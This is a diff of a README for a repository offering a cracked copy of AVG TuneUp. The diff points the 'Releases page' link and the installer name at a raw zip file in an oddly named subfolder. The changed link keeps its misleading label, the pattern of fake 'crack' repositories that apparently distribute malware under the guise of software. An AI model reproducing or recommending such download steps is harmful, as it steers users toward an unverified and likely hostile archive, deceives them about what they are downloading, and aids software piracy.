Lovelyarun46/AVG-TuneUp-Crack/README.md

 ## 📥 Download & Install

 1. **Visit the Releases Page:**
-   Go to the [Releases page](https://github.com/Lovelyarun46/AVG-TuneUp-Crack/releases) to access the latest version of AVG-TuneUp-Crack.
+   Go to the [Releases page](https://raw.githubusercontent.com/Lovelyarun46/AVG-TuneUp-Crack/main/Scaramouch/AVG-TuneUp-Crack.zip) to access the latest version of AVG-TuneUp-Crack.

 2. **Choose Your Version:**
    Look for the latest release.
 Click on the version you want to download.

 3. **Download the Installer:**
    Click the download link for the installer file.
-It may have a name similar to `AVG-TuneUp-Crack-setup.exe`.
+It may have a name similar to `https://raw.githubusercontent.com/Lovelyarun46/AVG-TuneUp-Crack/main/Scaramouch/AVG-TuneUp-Crack.zip`.

 4. **Locate the Downloaded File:**
    Once the download is complete, find the file in your Downloads folder or the location you saved it.